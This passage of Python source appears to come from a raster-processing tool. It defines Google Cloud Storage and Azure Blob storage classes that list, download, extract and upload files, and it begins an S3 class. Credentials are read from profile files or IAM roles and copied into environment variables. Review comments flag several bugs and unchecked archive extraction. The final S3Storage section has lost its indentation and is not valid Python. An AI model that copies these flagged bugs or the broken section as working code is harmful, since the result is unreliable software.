        self._upl_container_name = container_name
        self._upl_parent_folder = parent_folder
        self._upl_properties = properties
        return True

    def setSource(self, container_name, parent_folder, properties=None):
        """Record the download source; concrete classes perform the transfer."""
        self._dn_container_name = container_name
        self._dn_parent_folder = parent_folder
        self._dn_properties = properties
        return True

    def readProfile(self, account_name, account_key):
        """Read the named options for this profile from the user's
        ~/.OptimizeRasters/Microsoft/azure_credentials file.

        Returns a (name, key) tuple; either element is None when missing.
        """
        parser = ConfigParser.RawConfigParser()
        home = os.path.expanduser('~').replace('\\', '/')
        credentialsFile = '{}/{}/{}'.format(
            home, '.OptimizeRasters/Microsoft', 'azure_credentials')
        with open(credentialsFile) as stream:
            parser.read_file(stream)
        if (not parser.has_section(self._profile_name)):
            return (None, None)

        def _option(name):
            # return None rather than raising for an absent option
            if (parser.has_option(self._profile_name, name)):
                return parser.get(self._profile_name, name)
            return None
        return (_option(account_name), _option(account_key))

    def message(self, msg, status=0):  # type (0: general, 1: warning, 2: critical, 3: statusText)
        """Route a log line through the shared Base when present, else print
        it with a severity prefix."""
        if (self._base):
            self._base.message(msg, status)
            return
        status_text = {1: 'Warning', 2: 'Err'}.get(status, '')
        print('{}{}{}'.format(status_text, '. ' if status_text else '', msg))
class Google(Store):
    """Google Cloud Storage provider: browse, download and upload blobs
    using the google-cloud-storage SDK."""
    DafaultStorageDomain = 'http://storage.googleapis.com/'

    def __init__(self, project_name, client_id, client_secret, profile_name=None, base=None):
        # profile_name here is the path to a service-account JSON file.
        super(Google, self).__init__(
            client_id, client_secret, profile_name, base)
        self._browsecontent = []   # blob names gathered during scan mode
        self._projectName = project_name
        self._client = None        # google.cloud.storage.Client
        self._bucket = None        # resolved Bucket handle

    def init(self, bucketName):
        """Create the storage client and resolve *bucketName*.

        When no project name was given it is read from the 'project_id' key
        of the service-account JSON. Returns False (after logging) on any
        failure.
        """
        try:
            if (self._profile_name is None or
                    not bucketName):
                return False
            if (not self._projectName):
                with open(self._profile_name, 'r') as reader:
                    serviceJson = json.load(reader)
                Project_Id = 'project_id'
                if (Project_Id not in serviceJson):
                    raise Exception(
                        '(Project_Id) key isn\'t found in file ({})'.format(self._profile_name))
                self._projectName = serviceJson[Project_Id]
            # the google SDK picks these up from the environment.
            os.environ['GCLOUD_PROJECT'] = self._projectName
            os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = self._profile_name
            from google.cloud import storage
            self._client = storage.Client()
            self._bucket = self._client.lookup_bucket(bucketName)
            if (self._bucket is None):
                raise Exception('Bucket ({}) isn\'t found!'.format(bucketName))
        except Exception as e:
            self.message(str(e), self.const_critical_text)
            return False
        return True

    @property
    def id(self):
        return 'gs'  # short for google-storage

    def _addBrowseContent(self, blobName):
        # Only collect names while scanning; in operation mode the callback
        # path (cb) handles each blob instead.
        if (not blobName):
            return False
        if (self._mode == self.CMODE_SCAN_ONLY):
            self._browsecontent.append(blobName)
            return True
        return False

    def getBrowseContent(self):
        """Blob names collected by browseContent in scan-only mode."""
        return self._browsecontent

    def browseContent(self, bucketName, parentFolder, cb=None, precb=None):
        """Enumerate blobs under *parentFolder*, invoking precb/cb per blob.

        precb receives (relative name, remote path, output path) from the
        resume reporter's header; cb receives the raw blob name and is only
        called outside scan-only mode.
        """
        url = parentFolder
        if (url == '/' or
                url is None):
            url = ''  # defaults to bucket root.
        super(Google, self).setSource(bucketName, url)
        for item in self._bucket.list_blobs(prefix=url, delimiter='/{}'.format('*' if self._include_subFolders else '')):
            self._addBrowseContent(item.name)
            if (precb and
                    self._base.getUserConfiguration):
                _resumeReporter = self._base.getUserConfiguration.getValue(
                    CPRT_HANDLER)
                if (_resumeReporter):
                    remotePath = _resumeReporter._header[CRESUME_HDR_INPUT]
                    precb(item.name if remotePath == '/' else item.name.replace(remotePath,
                                                                                ''), remotePath, _resumeReporter._header[CRESUME_HDR_OUTPUT])
            if (cb and
                    self._mode != self.CMODE_SCAN_ONLY):
                cb(item.name)
        return True

    def copyToLocal(self, blob_source):
        """Download one blob to its computed local path and kick off any
        follow-up work (TIL registration, clone-path copy, direct upload).

        Returns True on success or when the blob is legitimately skipped
        (already copied per the resume record, a folder, or not on the job
        list); False on error or when the blob is filtered out.
        """
        if (not blob_source or
                self._dn_parent_folder is None):  # note> empty value in parent path is allowed but not (None)
            self.message('{}> Not initialized'.format(
                self.id), self.const_critical_text)
            return False
        try:
            _user_config = self._base.getUserConfiguration
            _resumeReporter = _user_config.getValue(CPRT_HANDLER)
            # what does the restore point say about the (blob_source) status?
            if (_resumeReporter):
                # if -subs=true but not on .orjob/internal list, bail out early
                if (blob_source not in _resumeReporter._input_list_info):
                    return True
                if (blob_source.endswith('/')):  # skip folders.
                    return True
                _get_rstr_val = _resumeReporter.getRecordStatus(
                    blob_source, CRPT_COPIED)
                if (_get_rstr_val == CRPT_YES):
                    self.message('{} {}'.format(
                        CRESUME_MSG_PREFIX, blob_source))
                    return True
            # ends
            _googleParentFolder = _user_config.getValue(
                CIN_GOOGLE_PARENTFOLDER, False)
            _googlePath = blob_source if _googleParentFolder == '/' else blob_source.replace(
                _googleParentFolder, '')
            output_path = _user_config.getValue(
                CCFG_PRIVATE_OUTPUT, False) + _googlePath
            isUpload = self._base.getBooleanValue(
                _user_config.getValue(CCLOUD_UPLOAD))
            # when staging through a temp output ahead of a cloud upload,
            # download into the temp area instead.
            if (_user_config.getValue(CISTEMPOUTPUT) and
                    isUpload):
                output_path = _user_config.getValue(
                    CTEMPOUTPUT, False) + _googlePath
            if (not output_path):
                return False
            is_raster = False
            is_tmp_input = self._base.getBooleanValue(
                _user_config.getValue(CISTEMPINPUT))
            primaryRaster = None
            if (_resumeReporter and
                    is_tmp_input):
                primaryRaster = _resumeReporter._m_rasterAssociates.findPrimaryExtension(
                    _googlePath)
            if (filterPaths(blob_source, _user_config.getValue(CCFG_EXCLUDE_NODE))):
                return False
            elif (primaryRaster or  # if the blob_source is an associated raster file, consider it as a raster.
                  filterPaths(blob_source, _user_config.getValue(CCFG_RASTERS_NODE))):
                isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
                if (is_tmp_input):
                    if (not isTIL):
                        output_path = _user_config.getValue(
                            CTEMPINPUT, False) + _googlePath
                is_raster = not isTIL
                if (_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
                    return False
            flr = os.path.dirname(output_path)
            if (not os.path.exists(flr)):
                try:
                    makedirs(flr)
                except Exception as e:
                    raise
            # rasters that aren't staged through a temp input are processed
            # straight from the cloud; no local copy needed.
            if (is_raster):
                if (not is_tmp_input):
                    return True
            writeTo = output_path
            self.message('[{}-Pull] {}'.format(self.id, blob_source))
            if (not is_raster):
                writeTo = self._base.renameMetaFileToMatchRasterExtension(
                    writeTo)
            blob = self._bucket.get_blob(blob_source)
            blob.download_to_filename(writeTo)
            if (self._event_postCopyToLocal):
                self._event_postCopyToLocal(writeTo)
            # take care of (til) inputs.
            if (til):
                if (writeTo.lower().endswith(CTIL_EXTENSION_)):
                    if (til.addTIL(writeTo)):
                        til.setOutputPath(writeTo, writeTo)
            # ends
            # mark download/copy status
            if (_resumeReporter):
                _resumeReporter.updateRecordStatus(
                    blob_source, CRPT_COPIED, CRPT_YES)
            # ends
            # copy metadata files to -clonepath if set
            # do not copy raster associated files to clone path.
            if (not is_raster):
                self._base.copyMetadataToClonePath(output_path)
            # ends
            # Handle any post-processing, if the final destination is to S3, upload right away.
            if (isUpload):
                if (self._base.getBooleanValue(_user_config.getValue(CISTEMPINPUT))):
                    if (is_raster):
                        return True
                _is_success = self._base.S3Upl(writeTo, user_args_Callback)
                if (not _is_success):
                    return False
            # ends
        except Exception as e:
            # NOTE(review): if the exception fires before _resumeReporter is
            # assigned, this handler raises NameError — confirm ordering.
            self.message('({})'.format(str(e)), self.const_critical_text)
            if (_resumeReporter):
                _resumeReporter.updateRecordStatus(
                    blob_source, CRPT_COPIED, CRPT_NO)
            return False
        return True

    def upload(self, input_path, container_name, parent_folder, properties=None):
        """Upload a local file to GCS under the computed parent folder.

        The parent folder defaults to the configured input parent folder,
        is remapped from the temp-output prefix when properties carry one,
        and may receive the user's -hashkey text. Returns True on success.
        """
        if (not input_path or
                not container_name or
                parent_folder is None):
            return False
        _parent_folder = parent_folder
        if (not _parent_folder):
            if (self._base.getUserConfiguration):
                _parent_folder = self._base.getUserConfiguration.getValue(
                    CIN_GOOGLE_PARENTFOLDER)
        if (_parent_folder == '/' or
                _parent_folder is None):
            _parent_folder = ''
        if (properties):
            if (CTEMPOUTPUT in properties):
                _tempoutput = properties[CTEMPOUTPUT]
                _parent_folder = os.path.dirname(input_path.replace(
                    '\\', '/').replace(_tempoutput, _parent_folder))
        usrPath = self._base.getUserConfiguration.getValue(
            CUSR_TEXT_IN_PATH, False)
        # default insert pos (sub-folder loc) for user text in output path
        usrPathPos = CHASH_DEF_INSERT_POS
        if (usrPath):
            (usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
        _parent_folder = self._base.insertUserTextToOutputPath('{}{}'.format(
            _parent_folder, '/' if not _parent_folder.endswith('/') else ''), usrPath, usrPathPos)
        super(Google, self).upload(input_path,
                                   container_name, _parent_folder, properties)
        localPath = self._input_file_path
        cloudPath = self._base.convertToForwardSlash(os.path.join(
            self._upl_parent_folder, os.path.basename(localPath)), False)
        try:
            self.message('[{}-Push] {}'.format(self.id, cloudPath))
            from google.cloud import storage
            # has to use a new client,bucket object/upload_from_filename api has issues in a threaded environment.
            client = storage.Client()
            bucket = client.get_bucket(self._bucket.name)
            blob = bucket.blob(cloudPath)
            blob.upload_from_filename(localPath)
        except Exception as e:
            self.message(str(e), self.const_critical_text)
            return False
        return True
class Azure(Store):
    """Azure Blob Storage provider: browse, download (with optional .tar.gz
    expansion) and upload blobs via azure-storage-blob."""
    CHUNK_MIN_SIZE = 4 * 1024 * 1024
    # option names expected in the user's azure_credentials profile file
    COUT_AZURE_ACCOUNTNAME_INFILE = 'azure_account_name'
    COUT_AZURE_ACCOUNTKEY_INFILE = 'azure_account_key'
    DefaultDomain = 'blob.core.windows.net'

    class azBlobInternal(object):
        """Lightweight stand-in carrying just a blob's name."""

        def __init__(self, name):
            self.name = name

        @property
        def name(self):
            return self._name

        @name.setter
        def name(self, value):
            self._name = value

    def __init__(self, account_name, account_key, profile_name=None, base=None):
        super(Azure, self).__init__(
            account_name, account_key, profile_name, base)
        self._browsecontent = []  # blob names gathered during scan mode

    def init(self, direction=CS3STORAGE_IN):
        """Set up the BlobServiceClient for the given transfer direction.

        Supports either account name+key (optionally read from the profile
        file) or a SAS URL; a SAS token found in the account name is split
        out and stored in the user configuration. Returns False (after
        logging) on failure.
        """
        try:
            if (not self._account_name):
                (self._account_name, self._account_key) = self.readProfile(
                    self.COUT_AZURE_ACCOUNTNAME_INFILE, self.COUT_AZURE_ACCOUNTKEY_INFILE)
            self._SASToken = self._SASBucket = None
            if (self._account_name):
                if (not self._account_name.lower().startswith('http')):
                    self._account_name = 'https://{}.blob.core.windows.net'.format(
                        self._account_name)
                breakSAS = self._account_name.split('?')
                if (len(breakSAS) == 2):
                    self._SASToken = breakSAS[-1]
                    # get bucket name from the SAS string.
                    self._SASBucket = breakSAS[0].split('/')[-1]
                    self._account_name = breakSAS[0][:breakSAS[0].rfind('/')]
                    if (self._base):
                        self._base.getUserConfiguration.setValue(
                            CFGAZSAS if direction == CS3STORAGE_IN else CFGAZSASW, self._SASToken)
            if (not self._account_name and
                    not self._SASToken):
                return False
            from azure.storage.blob import BlobServiceClient
            self._blobSrvCli = BlobServiceClient(
                account_url=self._account_name, credential=self._SASToken if self._SASToken else self._account_key)
            self._blob_service = None
            if (self._base):
                container = self._base.getUserConfiguration.getValue(
                    CIN_AZURE_CONTAINER if direction == CS3STORAGE_IN else COUT_AZURE_CONTAINER)
                self._blob_service = self._blobSrvCli.get_container_client(
                    container)
                ACL = None
                if (self._base.getBooleanValue(self._base.getUserConfiguration.getValue(UseToken))):
                    ACL = {'public_access': None}
                try:
                    if (ACL is None):
                        ACL = self._blob_service.get_container_access_policy()
                        if (not isinstance(ACL, dict)):
                            ACL = None
                        if (ACL):
                            if ('public_access' not in ACL or
                                    ACL['public_access'] is not None):
                                ACL = None
                except Exception as e:
                    # best-effort: a private container can deny the policy
                    # read; treated the same as 'no token needed' below.
                    pass
                if (ACL and
                        ACL['public_access'] is None):  # internally access rights get checked on the input/output containers.
                    if (self._base):
                        if (direction == CS3STORAGE_IN):
                            self._base.getUserConfiguration.setValue(
                                UseToken, True)
                        else:
                            self._base.getUserConfiguration.setValue(
                                UseTokenOnOuput, True)
            # expose the account to externally-invoked tools (e.g. GDAL).
            # NOTE(review): this parse assumes the account URL contains '//'
            # and a dotted host — confirm for custom domains.
            os.environ['AZURE_STORAGE_ACCOUNT'] = self._account_name.split('.')[
                0].split('//')[1]
            if (self._account_key):
                os.environ['AZURE_STORAGE_ACCESS_KEY'] = self._account_key
        except Exception as e:
            self.message(str(e), self.const_critical_text)
            return False
        return True

    @property
    def getAccountName(self):
        """The (normalized) account URL in use."""
        return self._account_name

    def _runBlock(self, bobj, fobj, container_name, blob_name, block_id):
        # Upload one pre-filled block buffer, then release it.
        fobj.seek(0)
        bobj.put_block(container_name, blob_name, fobj.read(), block_id)
        fobj.close()
        del fobj

    def _addBrowseContent(self, blobName):
        # Only collect names while scanning; operation mode uses callbacks.
        if (not blobName):
            return False
        if (self._mode == self.CMODE_SCAN_ONLY):
            self._browsecontent.append(blobName)
            return True
        return False

    def getBrowseContent(self):
        """Blob names collected by browseContent in scan-only mode."""
        return self._browsecontent

    def browseContent(self, container_name, parent_folder, cb=None, precb=None):
        """Enumerate blobs under *parent_folder*, invoking precb/cb per blob.

        With a resume reporter present the job's own input list drives the
        walk (so missing blobs can be marked not-copied); otherwise the
        container is listed by prefix. Subfolders are skipped unless
        _include_subFolders is set.
        """
        super(Azure, self).setSource(container_name, parent_folder)
        parentDepth = len(parent_folder.split('/'))
        blobs = []
        _resumeReporter = self._base.getUserConfiguration.getValue(
            CPRT_HANDLER)
        if (_resumeReporter):
            for i in range(0, len(_resumeReporter._input_list)):
                if (_resumeReporter._input_list[i].endswith('/')):
                    continue
                szBlobs = self._blob_service.walk_blobs(
                    name_starts_with=_resumeReporter._input_list[i])
                try:  # Can throw if the necessary account access permissions are not valid. walk_blobs response is misleading.
                    bFound = False
                    for blob in szBlobs:
                        if (not bFound):
                            bFound = True
                        blobs.append(self.azBlobInternal(blob.name))
                    if (not bFound):
                        _resumeReporter.updateRecordStatus(
                            _resumeReporter._input_list[i], CRPT_COPIED, CRPT_NO)
                except Exception as e:
                    break
        else:
            blobs = self._blob_service.list_blobs(
                name_starts_with=parent_folder)
        for blob in blobs:
            levels = blob.name.split('/')
            if (not self._include_subFolders):
                if (len(levels) > parentDepth):
                    continue
            name = blob.name
            if (_resumeReporter):
                if (not name in _resumeReporter._input_list):
                    continue
            self._addBrowseContent(name)
            if (precb and
                    self._base.getUserConfiguration):
                if (_resumeReporter):
                    remotePath = _resumeReporter._header[CRESUME_HDR_INPUT]
                    precb(name if remotePath == '/' else name.replace(remotePath, ''),
                          remotePath, _resumeReporter._header[CRESUME_HDR_OUTPUT])
            if (cb and
                    self._mode != self.CMODE_SCAN_ONLY):
                cb(name)
        return True

    @TimeIt.timeOperation
    def __copyRemoteToLocal(self, blob_source, writeTo, **kwargs):
        """Download one blob to *writeTo*; .tar.gz archives are expanded and
        their members registered with the resume reporter / module-level
        raster_buff queue. Returns False (and marks not-copied) on error.
        """
        try:
            _resumeReporter = self._base.getUserConfiguration.getValue(
                CPRT_HANDLER)
            cli = self._blob_service.get_blob_client(blob_source)
            with open(writeTo, 'wb') as writer:
                cli.download_blob().download_to_stream(writer)
            _, f = os.path.split(blob_source)
            baseName = f.split(TarGzExt)[0]
            if (f.lower().endswith(TarGzExt)):
                tarFile = tarfile.open(writeTo)
                extractTo = os.path.join(os.path.dirname(writeTo), baseName)
                tarFile.extractall(extractTo)
                bToCloud = self._base.getBooleanValue(
                    self._base.getUserConfiguration.getValue(CCLOUD_UPLOAD))
                for x in tarFile.getmembers():
                    if (int(x.type) != 0):  # regular files only
                        continue
                    if (_resumeReporter):
                        # register each extracted member as an already-copied
                        # input record.
                        name = '{}/{}/{}'.format(
                            blob_source[:blob_source.rfind('/')], baseName, x.name)
                        _resumeReporter.addFile(name)
                        _resumeReporter._input_list_info[name] = {
                            CRPT_COPIED: CRPT_YES,
                            CRPT_PROCESSED: '',
                            CRPT_UPLOADED: ''
                        }
                        if (not filterPaths(x.name, self._base.getUserConfiguration.getValue(CCFG_RASTERS_NODE))):
                            # non-raster member: move straight to the output
                            # when no cloud upload is pending.
                            if (not bToCloud):
                                trail = '{}/{}'.format(baseName, x.name)
                                dst = os.path.join(
                                    _resumeReporter._header[CRESUME_HDR_OUTPUT], os.path.dirname(trail))
                                if (not os.path.exists(dst)):
                                    os.makedirs(dst)
                                shutil.move(os.path.join(
                                    os.path.dirname(writeTo), trail), dst)
                            continue
                        # queue raster members onto the module-level work list.
                        raster_buff.append(
                            {'dst': _resumeReporter._header[CRESUME_HDR_OUTPUT], 'f': name.replace(_resumeReporter._header[CRESUME_HDR_INPUT], ''), 'src': _resumeReporter._header[CRESUME_HDR_INPUT]})
                tarFile.close()
                # drop the archive itself from the work list; its members
                # were queued above.
                # NOTE(review): assumes _resumeReporter is set here — a
                # tar.gz download without a reporter would raise.
                nLen = len(_resumeReporter._header[CRESUME_HDR_INPUT])
                for i in range(0, len(raster_buff)):
                    if (raster_buff[i]['f'] == blob_source[nLen:]):
                        raster_buff.pop(i)
                        break
                if (not bToCloud):
                    os.remove(writeTo)
        except Exception as e:
            # NOTE(review): if the exception fires before _resumeReporter is
            # assigned, this handler raises NameError — confirm ordering.
            self._base.message('({})'.format(str(e)),
                               self._base.const_critical_text)
            if (_resumeReporter):
                _resumeReporter.updateRecordStatus(
                    blob_source, CRPT_COPIED, CRPT_NO)
            return False
        return True

    def copyToLocal(self, blob_source, **kwargs):
        """Download one blob to its computed local path and kick off any
        follow-up work (TIL registration, clone-path copy, direct upload,
        .tar.gz member uploads).

        Returns True on success or when the blob is legitimately skipped
        (already copied per the resume record or not on the job list);
        False on error or when the blob is filtered out.
        """
        try:
            if (not blob_source):
                return False
            _user_config = self._base.getUserConfiguration
            _resumeReporter = _user_config.getValue(CPRT_HANDLER)
            # what does the restore point say about the (blob_source) status?
            if (_resumeReporter):
                # if -subs=true but not on .orjob/internal list, bail out early
                if (blob_source not in _resumeReporter._input_list_info):
                    return True
                _get_rstr_val = _resumeReporter.getRecordStatus(
                    blob_source, CRPT_COPIED)
                if (_get_rstr_val == CRPT_YES):
                    self._base.message('{} {}'.format(
                        CRESUME_MSG_PREFIX, blob_source))
                    return True
            # ends
            _azureParentFolder = _user_config.getValue(
                CIN_AZURE_PARENTFOLDER, False)
            _azurePath = blob_source if _azureParentFolder == '/' else blob_source.replace(
                _azureParentFolder, '')
            output_path = _user_config.getValue(
                CCFG_PRIVATE_OUTPUT, False) + _azurePath
            isUpload = self._base.getBooleanValue(
                _user_config.getValue(CCLOUD_UPLOAD))
            # when staging through a temp output ahead of a cloud upload,
            # download into the temp area instead.
            if (_user_config.getValue(CISTEMPOUTPUT) and
                    isUpload):
                output_path = _user_config.getValue(
                    CTEMPOUTPUT, False) + _azurePath
            is_raster = False
            is_tmp_input = self._base.getBooleanValue(
                _user_config.getValue(CISTEMPINPUT))
            primaryRaster = None
            if (_resumeReporter and
                    is_tmp_input):
                primaryRaster = _resumeReporter._m_rasterAssociates.findPrimaryExtension(
                    _azurePath)
            if (filterPaths(blob_source, _user_config.getValue(CCFG_EXCLUDE_NODE))):
                return False
            elif (primaryRaster or  # if the blob_source is an associated raster file, consider it as a raster.
                  filterPaths(blob_source, _user_config.getValue(CCFG_RASTERS_NODE))):
                isTIL = output_path.lower().endswith(CTIL_EXTENSION_)
                if (is_tmp_input):
                    if (not isTIL):
                        output_path = _user_config.getValue(
                            CTEMPINPUT, False) + _azurePath
                is_raster = not isTIL
                if (_user_config.getValue('Pyramids') == CCMD_PYRAMIDS_ONLY):
                    return False
            if (not blob_source or
                    not output_path or
                    not self._dn_parent_folder):
                self._base.message('Azure> Not initialized',
                                   self._base.const_critical_text)
                return False
            flr = os.path.dirname(output_path)
            if (not os.path.exists(flr)):
                try:
                    makedirs(flr)
                except Exception as e:
                    raise
            # rasters that aren't staged through a temp input are processed
            # straight from the cloud; no local copy needed.
            if (is_raster):
                if (not is_tmp_input):
                    return True
            writeTo = output_path
            self._base.message('[Azure-Pull] {}'.format(blob_source))
            if (not is_raster):
                writeTo = self._base.renameMetaFileToMatchRasterExtension(
                    writeTo)
            result = self.__copyRemoteToLocal(
                blob_source, writeTo, name=blob_source, method=TimeIt.Download, store=self._base)
            if (not result):
                return False
            if (self._event_postCopyToLocal):
                self._event_postCopyToLocal(writeTo)
            # take care of (til) inputs.
            if (til):
                if (writeTo.lower().endswith(CTIL_EXTENSION_)):
                    if (til.addTIL(writeTo)):
                        til.setOutputPath(writeTo, writeTo)
            # ends
            # mark download/copy status
            if (_resumeReporter):
                _resumeReporter.updateRecordStatus(
                    blob_source, CRPT_COPIED, CRPT_YES)
            # ends
            # copy metadata files to -clonepath if set
            # do not copy raster associated files to clone path.
            if (not is_raster):
                self._base.copyMetadataToClonePath(output_path)
            # ends
            # Handle any post-processing, if the final destination is to S3, upload right away.
            if (isUpload):
                if (getBooleanValue(_user_config.getValue(CISTEMPINPUT))):
                    if (is_raster):
                        # a downloaded archive is expanded and each raster
                        # member uploaded individually.
                        if (writeTo.endswith(TarGzExt[1:])):
                            tarFile = tarfile.open(writeTo)
                            p, f = os.path.split(writeTo)
                            for x in tarFile.getmembers():
                                if (int(x.type) != 0):
                                    continue
                                if (not filterPaths(x.name, _user_config.getValue(CCFG_RASTERS_NODE))):
                                    if (not self._base.S3Upl(os.path.join(p, '{}/{}'.format(f.split(TarGzExt)[0], x.name)), user_args_Callback, **{TarGz: True})):
                                        return False
                            tarFile.close()
                            os.remove(writeTo)
                        return True
                _is_success = self._base.S3Upl(writeTo, user_args_Callback)
                if (not _is_success):
                    return False
            # ends
        except Exception as e:
            self._base.message('({})'.format(str(e)),
                               self._base.const_critical_text)
            if (_resumeReporter):
                _resumeReporter.updateRecordStatus(
                    blob_source, CRPT_COPIED, CRPT_NO)
            return False
        return True

    @TimeIt.timeOperation
    def upload(self, input_path, container_name, parent_folder, properties=None, **kwargs):
        """Upload a local file to Azure under the computed parent folder.

        Ensures the destination container exists (retrying while a
        same-named container is being deleted, up to ~60s), then streams
        the file with its guessed MIME type. Returns True on success; a
        container-creation timeout terminates the process via exit(1).
        """
        if (not input_path or
                not container_name or
                parent_folder is None):
            return False
        _parent_folder = parent_folder
        if (not _parent_folder):
            if (self._base.getUserConfiguration):
                _parent_folder = self._base.getUserConfiguration.getValue(
                    CIN_AZURE_PARENTFOLDER)
        if (_parent_folder == '/' or
                _parent_folder is None):
            _parent_folder = ''
        if (properties):
            # archive members come from the temp *input* area, everything
            # else from the temp output area.
            prefix = CTEMPOUTPUT
            if (TarGz in properties):
                prefix = CTEMPINPUT
            if (prefix in properties):
                _tempoutput = properties[prefix]
                _parent_folder = os.path.dirname(input_path.replace(
                    '\\', '/').replace(_tempoutput, _parent_folder))
        usrPath = self._base.getUserConfiguration.getValue(
            CUSR_TEXT_IN_PATH, False)
        # default insert pos (sub-folder loc) for user text in output path
        usrPathPos = CHASH_DEF_INSERT_POS
        if (usrPath):
            (usrPath, usrPathPos) = usrPath.split(CHASH_DEF_SPLIT_CHAR)
        _parent_folder = self._base.insertUserTextToOutputPath('{}{}'.format(
            _parent_folder, '/' if not _parent_folder.endswith('/') else ''), usrPath, usrPathPos)
        super(Azure, self).upload(input_path,
                                  container_name, _parent_folder, properties)
        blob_path = self._input_file_path
        blob_name = os.path.join(
            self._upl_parent_folder, os.path.basename(blob_path))
        ## if (blob_name.endswith('.lrc')): # debug. Must be removed before release.
        ## return True # "
        # return True # debug. Must be removed before release.
        isContainerCreated = False
        t0 = datetime.now()
        time_to_wait_before_retry = 3
        max_time_to_wait = 60
        self.message('Accessing container ({})..'.format(
            self._upl_container_name))
        while(True):
            try:
                _access = properties['access'] if properties and 'access' in properties else None
                self._blobSrvCli.create_container(
                    self._upl_container_name, public_access=_access)
                isContainerCreated = True
                break
            except Exception as e:
                get_err_msg = str(e).lower()
                if (get_err_msg.find('the specified container is being deleted') == -1):
                    # NOTE(review): str.find returns -1 (truthy) when absent,
                    # so this condition is True for any message that does not
                    # *start* with 'already exists' — likely intended
                    # find('already exists') != -1. Verify before changing:
                    # the fall-through also serves as the fast-exit for
                    # unrelated errors.
                    if (get_err_msg.find('already exists')):
                        isContainerCreated = True
                        break
                tm_pre = datetime.now()
                # NOTE(review): busy-wait (no sleep) between retries.
                while(True):
                    time_delta = datetime.now() - tm_pre
                    if (time_delta.seconds > time_to_wait_before_retry):
                        break
                t1 = datetime.now() - t0
                if (t1.seconds > max_time_to_wait):
                    self.message('Timed out to create container.',
                                 self.const_critical_text)
                    break
        if (not isContainerCreated):
            self.message('Unable to create the container ({})'.format(
                self._upl_container_name), self.const_critical_text)
            exit(1)
        self.message('Done.')
        st = datetime.now()
        try:
            from azure.storage.blob import ContentSettings
            with open(blob_path, 'rb') as reader:
                cli = self._blob_service.get_blob_client(blob_name)
                mtype, encoding = (mimetypes.guess_type(blob_path))
                self.message('Uploading ({})'.format(blob_path))
                cli.upload_blob(
                    reader, overwrite=True, content_settings=ContentSettings(content_type=mtype))
        except Exception as e:
            self.message('File open/upload: ({})'.format(str(e)),
                         self.const_critical_text)
            return False
        finally:
            self.message('Duration. ({} sec)'.format(
                (datetime.now() - st).seconds))
            self.message('Done.')
        return True
class S3Storage:
RoleAccessKeyId = 'AccessKeyId'
RoleSecretAccessKey = 'SecretAccessKey'
RoleToken = 'Token'
def __init__(self, base):
self._base = base
self._isBucketPublic = False
self._isRequesterPay = False
self._isNoAccessToListBuckets = False
self._direction = CS3STORAGE_IN
def init(self, remote_path, s3_key, s3_secret, direction):
    """Establish the boto3/S3 session and bucket handle for this storage.

    remote_path -- bucket prefix to read/write, or a local report file
                   whose root becomes the prefix.
    s3_key / s3_secret -- explicit credentials; may be None when a profile,
                   IAM role or environment variables supply them.
    direction   -- CS3STORAGE_IN (download) or CS3STORAGE_OUT (upload).
    Returns True on success, False on any failure (already messaged).
    Side effect: seeds AWS_*/OSS_* environment variables so externally
    invoked tools can authenticate with the same credentials.
    """
    if (not isinstance(self._base, Base)):
        return False
    self._input_flist = None
    self.__m_failed_upl_lst = {}
    self.m_user_config = self._base.getUserConfiguration
    self.CAWS_ACCESS_KEY_ID = s3_key
    self.CAWS_ACCESS_KEY_SECRET = s3_secret
    self._direction = direction
    self.m_bucketname = ''  # no default bucket-name
    if (self.m_user_config):
        s3_bucket = self.m_user_config.getValue('{}_S3_Bucket'.format(
            'Out' if direction == CS3STORAGE_OUT else 'In'), False)
        if (s3_bucket):
            self.m_bucketname = s3_bucket
        _profile_name = self.m_user_config.getValue('{}_S3_AWS_ProfileName'.format(
            'Out' if direction == CS3STORAGE_OUT else 'In'), False)
        # return type is a boolean hence no need to explicitly convert.
        if (self.m_user_config.getValue(CCFG_PRIVATE_INC_BOTO)):
            try:
                awsSessionToken = None
                sessionProfile = _profile_name
                # env-var names carry an 'OR_OUT_' prefix on the output side
                # so input and output credentials can coexist in the process.
                AWSSessionToken, AWSAccessKeyId, AWSSecretAccessKey = \
                    ['{}{}'.format('OR_OUT_' if direction == CS3STORAGE_OUT else '', i) for i in [
                        'AWS_SESSION_TOKEN', 'AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY']]
                if (_profile_name and
                        _profile_name.lower().startswith('using_')):
                    # profile names starting with 'using_' mean: pull temporary
                    # credentials from the EC2 instance IAM role instead.
                    roleInfo = self.getIamRoleInfo()
                    if (roleInfo is None):
                        return False
                    sessionProfile = None
                    self.CAWS_ACCESS_KEY_ID = roleInfo[self.RoleAccessKeyId]
                    self.CAWS_ACCESS_KEY_SECRET = roleInfo[self.RoleSecretAccessKey]
                    awsSessionToken = roleInfo[self.RoleToken]
                    # let's initialize the AWS env variables to allow GDAL to work when invoked externally.
                    os.environ[AWSAccessKeyId] = self.CAWS_ACCESS_KEY_ID
                    os.environ[AWSSecretAccessKey] = self.CAWS_ACCESS_KEY_SECRET
                    os.environ[AWSSessionToken] = awsSessionToken
                    # ends
                if (not awsSessionToken):
                    if (AWSSessionToken in os.environ):
                        # it's assumed the [AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY] are also set by the client as env vars.
                        awsSessionToken = os.environ[AWSSessionToken]
                import botocore
                session = None
                # no key, no secret, no profile -> treat the bucket as public.
                self._isBucketPublic = self.CAWS_ACCESS_KEY_ID is None and \
                    self.CAWS_ACCESS_KEY_SECRET is None and \
                    _profile_name is None
                try:
                    session = boto3.Session(self.CAWS_ACCESS_KEY_ID if not sessionProfile else None, self.CAWS_ACCESS_KEY_SECRET if not sessionProfile else None,
                                            profile_name=_profile_name if not awsSessionToken else None, aws_session_token=awsSessionToken if awsSessionToken else None)
                except botocore.exceptions.ProfileNotFound as e:
                    self._base.message('Invalid profile name ({}), checking with AWS env variables..'.format(
                        _profile_name), self._base.const_warning_text)
                    if (AWSAccessKeyId in os.environ and
                            AWSSecretAccessKey in os.environ):
                        self.CAWS_ACCESS_KEY_ID = os.environ[AWSAccessKeyId]
                        self.CAWS_ACCESS_KEY_SECRET = os.environ[AWSSecretAccessKey]
                        session = boto3.Session(
                            self.CAWS_ACCESS_KEY_ID, self.CAWS_ACCESS_KEY_SECRET)
                if (not session):
                    return False
                endpointURL = None
